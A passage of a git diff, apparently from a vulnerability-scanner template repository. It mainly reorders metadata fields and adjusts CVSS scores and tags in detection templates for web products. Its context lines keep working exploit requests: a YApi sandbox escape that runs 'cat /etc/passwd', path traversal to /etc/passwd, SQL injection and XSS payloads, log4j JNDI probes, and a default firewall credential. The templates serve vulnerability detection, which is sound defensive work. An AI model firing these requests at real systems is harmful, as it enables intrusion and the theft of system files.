b/http/vulnerabilities/other/tamronos-rce.yaml index 372cc9ac25..a2fe3f7602 100644 --- a/http/vulnerabilities/other/tamronos-rce.yaml +++ b/http/vulnerabilities/other/tamronos-rce.yaml @@ -10,11 +10,11 @@ info: - https://twitter.com/sec715/status/1405336456923471874 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-78 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"TamronOS IPTV系统" fofa-query: title="TamronOS IPTV系统" tags: tamronos,rce @@ -26,7 +26,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/tamronos-user-creation.yaml b/http/vulnerabilities/other/tamronos-user-creation.yaml index 7373a090df..5f16211459 100644 --- a/http/vulnerabilities/other/tamronos-user-creation.yaml +++ b/http/vulnerabilities/other/tamronos-user-creation.yaml @@ -7,11 +7,10 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TamronOS%20IPTV%E7%B3%BB%E7%BB%9F%20submit%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="TamronOS-IPTV系统" tags: tamronos,miconfig,iptv - variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" diff --git a/http/vulnerabilities/other/tekon-info-leak.yaml b/http/vulnerabilities/other/tekon-info-leak.yaml index c4ad5bb2fc..cb8e44bbc1 100644 --- a/http/vulnerabilities/other/tekon-info-leak.yaml +++ b/http/vulnerabilities/other/tekon-info-leak.yaml @@ -18,6 +18,7 @@ http: - '{{BaseURL}}/cgi-bin/log.cgi' max-size: 2048 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/thinkific-redirect.yaml b/http/vulnerabilities/other/thinkific-redirect.yaml index 807ef32f79..2f26bdc8b3 100644 --- a/http/vulnerabilities/other/thinkific-redirect.yaml +++ b/http/vulnerabilities/other/thinkific-redirect.yaml @@ -10,13 +10,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect metadata: max-request: 1 + tags: redirect http: - method: GET - path: - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" @@ -25,6 +24,7 @@ http: - type: status status: - 302 + - type: word words: - "alert(31337)" part: body + - type: word words: - "text/html" diff --git a/http/vulnerabilities/other/tikiwiki-xss.yaml b/http/vulnerabilities/other/tikiwiki-xss.yaml index 421d43cad1..a4e888a3bf 100644 --- a/http/vulnerabilities/other/tikiwiki-xss.yaml +++ b/http/vulnerabilities/other/tikiwiki-xss.yaml @@ -9,9 +9,9 @@ info: reference: - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html metadata: + verified: true max-request: 2 shodan-query: http.html:"tiki wiki" - verified: true tags: edb,xss,tikiwiki,packetstorm,acketstorm http: @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/tpshop-directory-traversal.yaml b/http/vulnerabilities/other/tpshop-directory-traversal.yaml index f76f44e036..ef74b94326 100644 --- a/http/vulnerabilities/other/tpshop-directory-traversal.yaml +++ b/http/vulnerabilities/other/tpshop-directory-traversal.yaml @@ -3,17 +3,17 @@ id: tpshop-directory-traversal info: name: TPshop - Local File Inclusion author: pikpikcu - description: TPshop is vulnerable to local file inclusion. severity: high + description: TPshop is vulnerable to local file inclusion. reference: - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: tpshop,lfi metadata: max-request: 1 + tags: tpshop,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"state":"SUCCESS"' diff --git a/http/vulnerabilities/other/turbocrm-xss.yaml b/http/vulnerabilities/other/turbocrm-xss.yaml index e981d3196d..0ce1455459 100644 --- a/http/vulnerabilities/other/turbocrm-xss.yaml +++ b/http/vulnerabilities/other/turbocrm-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,turbocrm metadata: max-request: 1 + tags: xss,turbocrm http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - '">' diff --git a/http/vulnerabilities/other/twig-php-ssti.yaml b/http/vulnerabilities/other/twig-php-ssti.yaml index abd4307209..934c850799 100644 --- a/http/vulnerabilities/other/twig-php-ssti.yaml +++ b/http/vulnerabilities/other/twig-php-ssti.yaml @@ -5,9 +5,9 @@ info: author: madrobot severity: high description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. - tags: php,ssti,twig metadata: max-request: 1 + tags: php,ssti,twig http: - method: GET @@ -15,6 +15,7 @@ http: - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D" skip-variables-check: true + matchers-condition: and matchers: - type: word @@ -25,4 +26,4 @@ http: - type: status status: - 404 - negative: true \ No newline at end of file + negative: true diff --git a/http/vulnerabilities/other/ueditor-file-upload.yaml b/http/vulnerabilities/other/ueditor-file-upload.yaml index d5a6bf05de..43e1bba403 100644 --- a/http/vulnerabilities/other/ueditor-file-upload.yaml +++ b/http/vulnerabilities/other/ueditor-file-upload.yaml @@ -12,19 +12,21 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 - tags: ueditor,fileupload metadata: max-request: 1 + tags: ueditor,fileupload,intrusive http: - method: GET path: - "{{BaseURL}}/ueditor/net/controller.ashx?action=catchimage&encode=utf-8" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "没有指定抓取源" diff --git a/http/vulnerabilities/other/umbraco-base-ssrf.yaml b/http/vulnerabilities/other/umbraco-base-ssrf.yaml index 030ddbeca3..53cb7dc9f8 100644 --- a/http/vulnerabilities/other/umbraco-base-ssrf.yaml +++ b/http/vulnerabilities/other/umbraco-base-ssrf.yaml @@ -12,8 +12,8 @@ info: cvss-score: 6.8 cwe-id: CWE-918 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.html:"Umbraco" tags: oast,edb,ssrf,umbraco @@ -26,6 +26,7 @@ http: stop-at-first-match: true req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml index 677c73589f..1c687bf4a5 100644 --- a/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: hoteldruid,panel,unauth metadata: max-request: 2 + tags: hoteldruid,panel,unauth http: - method: GET diff --git a/http/vulnerabilities/other/unauth-spark-api.yaml b/http/vulnerabilities/other/unauth-spark-api.yaml index bc4a379438..3044634402 100644 --- a/http/vulnerabilities/other/unauth-spark-api.yaml +++ b/http/vulnerabilities/other/unauth-spark-api.yaml @@ -5,26 +5,28 @@ info: author: princechaddha severity: critical description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: - https://xz.aliyun.com/t/2490 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. - tags: spark,unauth metadata: max-request: 1 + tags: spark,unauth http: - method: GET path: - "{{BaseURL}}/v1/submissions" + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - "Missing an action" diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index 8cc54cff81..c0a9230068 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -17,9 +17,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: http.title:"UniFi Network" - verified: true tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/universal-media-xss.yaml b/http/vulnerabilities/other/universal-media-xss.yaml index 3019d163bb..c8cebc6833 100644 --- a/http/vulnerabilities/other/universal-media-xss.yaml +++ b/http/vulnerabilities/other/universal-media-xss.yaml @@ -10,8 +10,8 @@ info: reference: - https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-902890504 tags: xss,universal,media,unauth,packetstorm diff --git a/http/vulnerabilities/other/vanguard-post-xss.yaml b/http/vulnerabilities/other/vanguard-post-xss.yaml index 3782461d1c..39d04154a4 100644 --- a/http/vulnerabilities/other/vanguard-post-xss.yaml +++ b/http/vulnerabilities/other/vanguard-post-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: vanguard,xss,packetstorm metadata: max-request: 1 + tags: vanguard,xss,packetstorm http: - raw: diff --git a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml index 2502189d55..d8ce3b73de 100644 --- a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -7,9 +7,9 @@ info: description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. reference: - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system - tags: crlf,viewlinc metadata: max-request: 1 + tags: crlf,viewlinc http: - method: GET diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index 7eb2c418fc..23e6b18dbc 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml @@ -16,9 +16,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"VMware Site Recovery Manager" - verified: true tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/vpms-auth-bypass.yaml b/http/vulnerabilities/other/vpms-auth-bypass.yaml index 9263946431..ebc4faf709 100644 --- a/http/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/http/vulnerabilities/other/vpms-auth-bypass.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/48877 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: auth-bypass,edb metadata: max-request: 1 + tags: auth-bypass,edb http: - raw: @@ -36,6 +36,7 @@ http: - "location.href = 'index.php';" condition: and part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/other/wapples-firewall-lfi.yaml b/http/vulnerabilities/other/wapples-firewall-lfi.yaml index eee33e617a..885355054c 100644 --- a/http/vulnerabilities/other/wapples-firewall-lfi.yaml +++ b/http/vulnerabilities/other/wapples-firewall-lfi.yaml @@ -12,8 +12,8 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Intelligent WAPPLES" tags: wapples,firewall,lfi,authenticated @@ -25,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded id={{username}}&password={{password}} - - | GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1 Host: {{Hostname}} @@ -37,7 +36,6 @@ http: - systemi password: - db/wp.no1 - cookie-reuse: true matchers: - type: regex diff --git a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml index 2622a53a45..16bbdf5ed8 100644 --- a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml +++ b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml @@ -10,11 +10,11 @@ info: - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability classification: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-288 - tags: watchguard,disclosure,edb metadata: max-request: 1 + tags: watchguard,disclosure,edb http: - method: GET diff --git a/http/vulnerabilities/other/webpagetest-ssrf.yaml b/http/vulnerabilities/other/webpagetest-ssrf.yaml index 2e72d2b724..1f5153eb06 100644 --- a/http/vulnerabilities/other/webpagetest-ssrf.yaml +++ b/http/vulnerabilities/other/webpagetest-ssrf.yaml @@ -8,8 +8,8 @@ info: - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/ - https://github.com/WPO-Foundation/webpagetest metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"WebPageTest" tags: ssrf,webpagetest,oast diff --git a/http/vulnerabilities/other/webui-rce.yaml b/http/vulnerabilities/other/webui-rce.yaml index 095b23a525..98d60aba8b 100644 --- a/http/vulnerabilities/other/webui-rce.yaml +++ b/http/vulnerabilities/other/webui-rce.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/36821 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: webui,rce,edb metadata: max-request: 1 + tags: webui,rce,edb http: - method: GET diff --git a/http/vulnerabilities/other/wems-manager-xss.yaml b/http/vulnerabilities/other/wems-manager-xss.yaml index aff071ae74..a90b980126 100644 --- a/http/vulnerabilities/other/wems-manager-xss.yaml +++ b/http/vulnerabilities/other/wems-manager-xss.yaml @@ -11,23 +11,26 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,packetstorm metadata: max-request: 1 + tags: xss,packetstorm http: - method: GET path: - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '">' part: body + - type: word words: - "text/html" diff --git a/http/vulnerabilities/other/wisegiga-nas-lfi.yaml b/http/vulnerabilities/other/wisegiga-nas-lfi.yaml index c15cad4020..30216ed1b6 100644 --- a/http/vulnerabilities/other/wisegiga-nas-lfi.yaml +++ b/http/vulnerabilities/other/wisegiga-nas-lfi.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/WiseGiga%20NAS%20down_data.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="WISEGIGA-NAS" tags: wisegiga,lfi,nas diff --git a/http/vulnerabilities/other/wuzhicms-sqli.yaml b/http/vulnerabilities/other/wuzhicms-sqli.yaml index b4bef39d65..055d14900f 100644 --- a/http/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/http/vulnerabilities/other/wuzhicms-sqli.yaml @@ -11,15 +11,14 @@ info: - https://vulners.com/cnvd/CNVD-2022-36985 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Wuzhicms" fofa-query: title="Wuzhicms" tags: wuzhicms,sqli - variables: num: "999999999" diff --git a/http/vulnerabilities/other/xdcms-sqli.yaml b/http/vulnerabilities/other/xdcms-sqli.yaml index a16ec9abf1..1f9dfa2f3f 100644 --- a/http/vulnerabilities/other/xdcms-sqli.yaml +++ b/http/vulnerabilities/other/xdcms-sqli.yaml @@ -9,12 +9,11 @@ info: - https://www.uedbox.com/post/35188/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: sqli,xdcms metadata: max-request: 1 - + tags: sqli,xdcms variables: num: "999999999" @@ -22,14 +21,15 @@ http: - method: POST path: - "{{BaseURL}}/index.php?m=member&f=login_save" + headers: Content-Type: application/x-www-form-urlencoded + body: | username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+ matchers-condition: and matchers: - - type: word words: - "Content-Type: text/html" diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index 2b4f23292a..cb7f348550 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -13,8 +13,8 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-502 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"XenMobile" tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast variables: diff --git a/http/vulnerabilities/other/xerox-efi-lfi.yaml b/http/vulnerabilities/other/xerox-efi-lfi.yaml index d53fafa8f8..698afb4589 100644 --- a/http/vulnerabilities/other/xerox-efi-lfi.yaml +++ b/http/vulnerabilities/other/xerox-efi-lfi.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: iot,xerox,disclosure,lfi,packetstorm,edb metadata: max-request: 1 + tags: iot,xerox,disclosure,lfi,packetstorm,edb http: - method: GET diff --git a/http/vulnerabilities/other/yapi-rce.yaml b/http/vulnerabilities/other/yapi-rce.yaml index ce9b3e58cf..8a49fcfa7a 100644 --- a/http/vulnerabilities/other/yapi-rce.yaml +++ b/http/vulnerabilities/other/yapi-rce.yaml @@ -12,11 +12,11 @@ info: - https://github.com/YMFE/yapi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: yapi,rce metadata: max-request: 7 + tags: yapi,rce,intrusive http: - raw: @@ -26,42 +26,37 @@ http: Content-Type: application/json;charset=UTF-8 {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + extractors: - type: regex name: group_id diff --git a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 3186a0d47c..06626f9d18 100644 --- a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -8,9 +8,9 @@ info: reference: - https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 - https://www.infosecmatter.com/nessus-plugin-library/?id=117615 - tags: apache,rce metadata: max-request: 1 + tags: apache,rce http: - method: POST @@ -24,6 +24,7 @@ http: - application-id - maximum-resource-capability condition: and + - type: status status: - 200 diff --git a/http/vulnerabilities/other/yeswiki-sql.yaml b/http/vulnerabilities/other/yeswiki-sql.yaml index 4b965f4639..6b263eb6d7 100644 --- a/http/vulnerabilities/other/yeswiki-sql.yaml +++ b/http/vulnerabilities/other/yeswiki-sql.yaml @@ -10,14 +10,13 @@ info: - https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"yeswiki" tags: yeswiki,sqli,huntr - variables: num: "999999999" diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index b8499a5433..56e84f998d 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -13,10 +13,10 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored-xss,huntr + tags: yeswiki,xss,stored-xss,huntr,intrusive http: - raw: @@ -55,7 +55,6 @@ http: 2 ------WebKitFormBoundaryT8dS2PT0WtxACLyu-- - - | GET /?BazaR&vue=consulter HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/yeswiki-xss.yaml b/http/vulnerabilities/other/yeswiki-xss.yaml index 91e12b5790..2b86dc7302 100644 --- a/http/vulnerabilities/other/yeswiki-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 6.5 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"yeswiki" tags: yeswiki,huntr,xss diff --git a/http/vulnerabilities/other/yishaadmin-lfi.yaml b/http/vulnerabilities/other/yishaadmin-lfi.yaml index 022395ac71..c156f61642 100644 --- a/http/vulnerabilities/other/yishaadmin-lfi.yaml +++ b/http/vulnerabilities/other/yishaadmin-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,yishaadmin,huntr metadata: max-request: 1 + tags: lfi,yishaadmin,huntr http: - raw: diff --git a/http/vulnerabilities/other/zcms-v3-sqli.yaml b/http/vulnerabilities/other/zcms-v3-sqli.yaml index 756b7f7476..aebfc9b0a1 100644 --- a/http/vulnerabilities/other/zcms-v3-sqli.yaml +++ b/http/vulnerabilities/other/zcms-v3-sqli.yaml @@ -9,12 +9,11 @@ info: - https://www.anquanke.com/post/id/183241 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: zcms,sqli metadata: max-request: 1 - + tags: zcms,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml b/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml index 13743e4490..4b6c524274 100755 --- a/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml +++ b/http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml @@ -9,9 +9,9 @@ info: - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 fofa-query: app="致翔软件-致翔OA" - verified: true tags: hongfan,oa,sqli http: @@ -26,4 +26,4 @@ http: - 'status_code == 500' - 'contains(body, "43f845fa0c8aef9104f8e1b07625ecf8")' - 'contains(header, "text/html")' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml index 32c4fdd0ba..3d9fed356f 100644 --- a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -14,9 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 - tags: zimbra,ssrf,oast metadata: max-request: 1 + tags: zimbra,ssrf,oast http: - raw: diff --git a/http/vulnerabilities/other/zms-auth-bypass.yaml b/http/vulnerabilities/other/zms-auth-bypass.yaml index d7186ce6fa..8ffbcb7334 100644 --- a/http/vulnerabilities/other/zms-auth-bypass.yaml +++ b/http/vulnerabilities/other/zms-auth-bypass.yaml @@ -10,11 +10,11 @@ info: - https://packetstormsecurity.com/files/159567/Zoo-Management-System-1.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: edb,auth-bypass,packetstorm,zms metadata: max-request: 1 + tags: edb,auth-bypass,packetstorm,zms http: - raw: @@ -31,6 +31,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: regex @@ -39,6 +40,7 @@ http: - "ZMS ADMIN" condition: and part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/other/zms-sqli.yaml b/http/vulnerabilities/other/zms-sqli.yaml index 8f58542553..b75813e753 100644 --- a/http/vulnerabilities/other/zms-sqli.yaml +++ b/http/vulnerabilities/other/zms-sqli.yaml @@ -11,11 +11,11 @@ info: - https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 tags: edb,packetstorm,zms,sqli,auth-bypass,cms http: @@ -29,6 +29,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/zzcms-xss.yaml b/http/vulnerabilities/other/zzcms-xss.yaml index b2d8dbce76..3d3eab09f5 100644 --- a/http/vulnerabilities/other/zzcms-xss.yaml +++ b/http/vulnerabilities/other/zzcms-xss.yaml @@ -12,8 +12,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 tags: zzcms,xss,authenticated http: @@ -24,7 +24,6 @@ http: Content-Type: application/x-www-form-urlencoded admin={{username}}&pass={{password}} - - | GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/php/php-xdebug-rce.yaml b/http/vulnerabilities/php/php-xdebug-rce.yaml index ad571bbd66..5fc702c1bc 100644 --- a/http/vulnerabilities/php/php-xdebug-rce.yaml +++ b/http/vulnerabilities/php/php-xdebug-rce.yaml @@ -11,9 +11,9 @@ info: - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/ - https://paper.seebug.org/397/ - https://github.com/D3Ext/XDEBUG-Exploit - tags: oast,rce,vulhub,php,debug,xdebug metadata: max-request: 1 + tags: oast,rce,vulhub,php,debug,xdebug,intrusive http: - raw: diff --git a/http/vulnerabilities/phpmyadmin-unauth.yaml b/http/vulnerabilities/phpmyadmin-unauth.yaml index 4664d52cd3..ecaf826b59 100644 --- a/http/vulnerabilities/phpmyadmin-unauth.yaml +++ b/http/vulnerabilities/phpmyadmin-unauth.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.phpmyadmin.net metadata: - max-request: 6 verified: true + max-request: 6 